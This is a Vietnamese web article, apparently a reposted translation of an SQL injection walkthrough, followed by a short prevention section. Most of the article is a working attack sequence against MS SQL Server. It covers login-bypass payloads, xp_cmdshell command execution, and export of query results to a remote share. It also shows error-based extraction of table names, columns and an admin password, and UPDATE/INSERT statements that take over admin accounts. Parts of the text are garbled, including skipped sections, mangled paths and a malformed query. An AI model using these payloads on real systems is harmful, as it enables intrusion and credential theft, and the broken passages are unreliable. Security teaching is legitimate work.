Xem Nhiều 6/2022 # Sql Injection Là Gì? Cách Phòng Chống Tấn Công Sql Injection # Top Trend

Xem 24,354

Cập nhật thông tin chi tiết về Sql Injection Là Gì? Cách Phòng Chống Tấn Công Sql Injection mới nhất ngày 27/06/2022 trên website Karefresh.com. Hy vọng nội dung bài viết sẽ đáp ứng được nhu cầu của bạn, chúng tôi sẽ thường xuyên cập nhật mới nội dung để bạn nhận được thông tin nhanh chóng và chính xác nhất. Cho đến thời điểm hiện tại, bài viết này đã đạt được 24,354 lượt xem.

--- Bài mới hơn ---

 • Những Lỗi Bảo Mật Website Cơ Bản
 • Tấn Công Kiểu Sql Injection Và Các Phòng Chống Trong Asp.net
 • Hướng Dẫn Test Sql Injection (Ví Dụ Và Cách Phòng Ngừa Các Cuộc Tấn Công Sql Injection)
 • Sql Injection Tutorial: Learn With Example
 • Tải Subway Surfers Mod Apk V2.3.0 (Hack Vàng, Chìa Khóa) Cho Android
 • SQL Injection không còn là khái niệm quá mới, nhưng nó vẫn là một trong những kiểu tấn công mạng khá phổ biến. Bài viết này gồm 12 mục, đi từ khái niệm, các bước diễn ra SQL Injection với một ví dụ minh họa (trang web được dùng làm ví dụ chỉ là minh họa, không có thực) đến cách phòng chống tấn công SQL Injection để bạn đọc hiểu về cách thức tấn công này, từ đó có những biện pháp phòng ngừa, bảo vệ website và hệ thống của mình.

  Lưu ý: Không thử tấn công website, hệ thống của cá nhân, tổ chức khác bằng phương pháp này, mọi hành vi như vậy đều là vi phạm pháp luật Việt Nam. Nếu bạn tìm thấy lỗ hổng bảo mật, hãy báo cho người quản trị website, hệ thống đó để họ khắc phục. Bài viết chỉ nhằm mục đích giúp bạn hiểu về kiểu tấn công SQL Injection và có những biện pháp phòng tránh cho ứng dụng web của mình.

  1. SQL Injection là gì?

  SQL Injection là một trong những kiểu hack web bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution (thực thi từ xa), dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, …

  Bài labs SQL Injection

  2. Các bước tiến hành SQL Injection

  2.1. Tìm kiếm mục tiêu

  Có thể tìm các trang web cho phép submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng, chẳng hạn như các trang login, search, feedback, …

  http://yoursite.com/index.asp?id=10

  Một số trang web chuyển tham số qua các field ẩn, phải xem mã HTML mới thấy rõ. Ví dụ như ở dưới.

  2.2. Kiểm tra chỗ yếu của trang web

  Thử submit các field username, password hoặc field id, .. bằng hi’ or 1=1–

  Login: hi' or 1=1-- Password: hi' or 1=1-- http://yoursite.com/index.asp?id=hi' or 1=1--

  Nếu site chuyển tham số qua field ẩn, hãy download source HTML, lưu trên đĩa cứng và thay đổi lại URL cho phù hợp. Ví dụ:

  Nếu thành công, thì có thể login vào mà không cần phải biết username và password

  2.3. Tại sao ‘ or 1=1– có thể vượt qua phần kiểm tra đăng nhập?

  Giả sử như có một trang ASP liên kết đến một ASP trang khác với URL như sau:

  http://yoursite.com/index.asp?category=food

  v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.execute(sqlstr)

  v_cat sẽ chứa giá trị của biến request(“category”) là ” và câu lệnh SQL tiếp theo sẽ là:

  SELECT * FROM product WHERE PCategory='food'

  Dòng query trên sẽ trả về một tập resultset chứa một hoặc nhiều dòng phù hợp với điều kiện WHERE PCategory=’food’

  Nếu thay đổi URL trên thành http://yoursite.com/index.asp?category=food’ or 1=1–, biến v_cat sẽ chứa giá trị “food’ or 1=1– ” và dòng lệnh SQL query sẽ là:

  SELECT * FROM product WHERE PCategory='food' or 1=1--'

  Dòng query trên sẽ select mọi thứ trong bảng product bất chấp giá trị của trường PCategory có bằng ‘food’ hay không. Hai dấu gạch ngang (–) chỉ cho MS SQL server biết đã hết dòng query, mọi thứ còn lại sau “–” sẽ bị bỏ qua. Đối với MySQL, hãy thay “–” thành “#”

  Ngoài ra, cũng có thể thử cách khác bằng cách submit ‘ or ‘a’=’a. Dòng SQL query bây giờ sẽ là:

  SELECT * FROM product WHERE PCategory='food' or 'a'='a'

  Một số loại dữ liệu khác mà cũng nên thử submit để biết xem trang web có gặp lỗi hay không:

  ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a

  2.4. Thi hành lệnh từ xa bằng SQL Injection

  '; exec master..xp_cmdshell 'ping 10.10.1.2'--

  Hãy thử dùng dấu nháy đôi (“) nếu dấu nháy đơn (‘) không làm việc.

  Dấu chấm phẩy (sẽ kết thúc dòng SQL query hiện tại và cho phép thi hành một SQL command mới. Để kiểm tra xem lệnh trên có được thi hành hay không, có thể listen các ICMP packet từ 10.10.1.2 bằng tcpdump như sau:

  #tcpdump icmp

  Nếu nhận được ping request từ 10.10.1.2 nghĩa là lệnh đã được thi hành.

  2.5. Nhận output của SQL query

  Có thể dùng sp_makewebtask để ghi các output của SQL query ra một file HTML

  '; EXEC master..sp_makewebtask "\10.10.1.3shareoutput.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

  Chú ý: folder “” phải được share cho Everyone trước.

  2.6. Nhận dữ liệu qua ‘database using ODBC error message

  Các thông báo lỗi của MS SQL Server thường đưa cho bạn những thông tin quan trọng. Lấy ví dụ ở trên http://yoursite.com/index.asp?id=10, bây giờ chúng ta thử hợp nhất integer ’10’ với một string khác lấy từ CSDL:

  http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

  Bảng INFORMATION_SCHEMA.TABLES của hệ thống SQL Server chứa thông tin về tất cả các bảng (table) có trên server. Trường TABLE_NAME chứa tên của mỗi bảng trong CSDL. Chúng ta chọn nó bởi vì chúng ta biết rằng nó luôn tồn tại. Query của chúng ta là:

  SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

  Dòng query này sẽ trả về tên của bảng đầu tiên trong CSDL

  Khi chúng ta kết hợp chuỗi này với số integer 10 qua statement UNION, MS SQL Server sẽ cố thử chuyển một string (nvarchar) thành một số integer. Điều này sẽ gặp lỗi nếu như không chuyển được nvarchar sang int, server sẽ hiện thông báo lỗi sau:

  Microsoft OLE DB Provider for ODBC Drivers error '80040e07' Syntax error converting the nvarchar value 'admin_login' to a column of data type int. chúng tôi line 5

  Mẫu so sánh ‘%25login%25’ sẽ tương đương với %login% trong SQL Server. Như thấy trong thông báo lỗi trên, chúng ta có thể xác định được tên của một table quan trọng là “admin_login“.

  2.7. Xác định tên của các column trong table

  Table INFORMATION_SCHEMA.COLUMNS chứa tên của tất cả các column trong table. Có thể khai thác như sau:

  http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

  Khi đó thông báo lỗi của SQL Server có thể như sau:

  Microsoft OLE DB Provider for ODBC Drivers error '80040e07' Syntax error converting the nvarchar value 'login_name' to a column of data type int. chúng tôi line 5

  Làm tương tự như trên, có thể lấy được tên của các column còn lại như “password“, “details“. Khi đó ta lấy tên của các column này qua các thông báo lỗi của SQL Server, như ví dụ sau:

  http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

  Khi đó thông báo lỗi của SQL Server có thể như sau:

  Microsoft OLE DB Provider for ODBC Drivers error '80040e14' Syntax error converting the nvarchar value 'neo' to a column of data type int. chúng tôi line 5

  Dễ dàng nhận ra được admin user đầu tiên có login_name là “neo”. Hãy thử lấy password của “neo” như sau:

  http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

  Khi đó thông báo lỗi của SQL Server có thể như sau:

  Microsoft OLE DB Provider for ODBC Drivers error '80040e07' Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int. chúng tôi line 5

  2.10. Thay đổi dữ liệu (Update/Insert) của CSDL

  Khi đã có tên của tất cả các column trong table, có thể sử dụng lệnh UPDATE hoặc INSERT để sửa đổi/tạo mới một record vào table này.

  Để thay đổi password của “”, có thể làm như sau:

  http://yoursite.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

  Hoặc nếu bạn muốn một record mới vào table:

  http://yoursite.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

  3. Ngăn chặn SQL Injection

  Các tổ chức có thể tập trung vào những bước sau đây để bảo vệ mình khỏi những cuộc tấn công SQL Injection:

  • Không bao giờ được tin tưởng những input người dùng nhập vào: Dữ liệu luôn phải được xác thực trước khi sử dụng trong các câu lệnh SQL.
  • Các thủ tục được lưu trữ: Những thủ tục này có thể trừu tượng hóa các lệnh SQL và xem xét toàn bộ input như các tham số. Nhờ đó, nó không thể gây ảnh hưởng đến cú pháp lệnh SQL.
  • Các lệnh được chuẩn bị sẵn: Điều này bao gồm việc tạo truy vấn SQL như hành động đầu tiên và sau đó xử lý toàn bộ dữ liệu được gửi như những tham số.
  • Những cụm từ thông dụng: Những cụm từ này được sử dụng để phát hiện mã độc và loại bỏ nó trước khi câu lệnh SQL được thực hiện.
  • Thông báo lỗi đúng: Thông báo lỗi phải tuyệt đối tránh tiết lộ những thông tin/chi tiết nhạy cảm và vị trí xảy ra lỗi trên thông báo lỗi.
  • Giới hạn quyền truy cập của người dùng đối với cơ sở dữ liệu: Chỉ những tài khoản có quyền truy cập theo yêu cầu mới được kết nối với cơ sở dữ liệu. Điều này có thể giúp giảm thiểu những lệnh SQL được thực thi tự động trên server.
  • Hãy loại bỏ các kí tự meta như ‘”/; và các kí tự extend như NULL, CR, LF, … trong các string nhận được từ:
    input do người dùng đệ trình
  • Đối với các giá trị numeric, hãy chuyển nó sang integer trước khi query SQL, hoặc dùng ISNUMERIC để chắc chắn nó là một số integer.
  • Thay đổi “Startup and run SQL Server” dùng mức low privilege user trong tab SQL Server Security.
  • Xóa các stored procedure trong database mà không dùng như:
    xp_cmdshell

  Ngăn chặn SQL Injection trong ASP.NET

  Các cách thức ngăn chặn SQL Injection được trình bày ở phần 12 đã bao quát đủ phương pháp, nhưng trong chúng tôi có cách ngăn chặn đơn giản là sử dụng các Parameters khi làm việc với object SqlCommand (hoặc OleDbCommand) chứ không sử dụng các câu lệnh SQL trực tiếp. Khi đó .NET sẽ tự động validate kiểu dữ liệu, nội dung dữ liệu trước khi thực hiện câu lệnh SQL.

  Ngoài ra, cũng cần kiểm soát tốt các thông báo lỗi. Và mặc định trong chúng tôi là thông báo lỗi sẽ không được thông báo chi tiết khi không chạy trên localhost.

  4. Tài liệu thao khảo

  1.How I hacked PacketStorm (Rain Forest Puppy) http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6 2.Great article on gathering information from ODBC error messages http://www.blackhat.com/psentations/win-usa-01/Litchfield/BHWin01Litchfield.doc 3.A good summary of SQL Injection on various SQL Server on http://www.owasp.org/asac/input_validation/sql.shtml 4.Senseport's article on reading SQL Injection http://www.sensepost.com/misc/SQLinsertion.htm 5.Khác: http://www.digitaloffense.net/warga.../IOWargames.ppt http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6 http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6

  Sưu tầm trên Internet từ bài được dịch từ bài viết gốc ” SQL Injection Walkthrough” của xfocus.net

  --- Bài cũ hơn ---

 • Hướng Dẫn Hack Spin Coin Master Miễn Phí Dành Cho Những Người Chơi Không Có Thời Gian Nhưng Vẫn Muốn Quay Nhiều
 • Hướng Dẫn Hack Coin Master Nhận Lượt Spin Không Giới Hạn 2022
 • Bản Chất Của Chiêu Trò “bẩn” Hack Doanh Thu Quán Net Đang Làm Các Chủ Quán Hoảng Sợ Và Cách Phòng Chống Ra Sao?
 • Thủ Thuật Faceboock: Hướng Dẫn Hack Tiền Quán Game ( Net )
 • Chủ Quán Net Khóc Ròng Vì ‘trẻ Trâu’ Dùng Hack Trong Valorant, Quyết Phạt 10 Triệu Đồng Nếu Khách Dám Cài Tool Hack Tại Quán
 • Bạn đang xem bài viết Sql Injection Là Gì? Cách Phòng Chống Tấn Công Sql Injection trên website Karefresh.com. Hy vọng những thông tin mà chúng tôi đã chia sẻ là hữu ích với bạn. Nếu nội dung hay, ý nghĩa bạn hãy chia sẻ với bạn bè của mình và luôn theo dõi, ủng hộ chúng tôi để cập nhật những thông tin mới nhất. Chúc bạn một ngày tốt lành!

 • Web hay
 • Links hay
 • Push
 • Chủ đề top 10
 • Chủ đề top 20
 • Chủ đề top 30
 • Chủ đề top 40
 • Chủ đề top 50
 • Chủ đề top 60
 • Chủ đề top 70
 • Chủ đề top 80
 • Chủ đề top 90
 • Chủ đề top 100
 • Bài viết top 10
 • Bài viết top 20
 • Bài viết top 30
 • Bài viết top 40
 • Bài viết top 50
 • Bài viết top 60
 • Bài viết top 70
 • Bài viết top 80
 • Bài viết top 90
 • Bài viết top 100
 • CẦM ĐỒ TẠI F88
  15 PHÚT DUYỆT
  NHẬN TIỀN NGAY

  VAY TIỀN NHANH
  LÊN ĐẾN 10 TRIỆU
  CHỈ CẦN CMND

  ×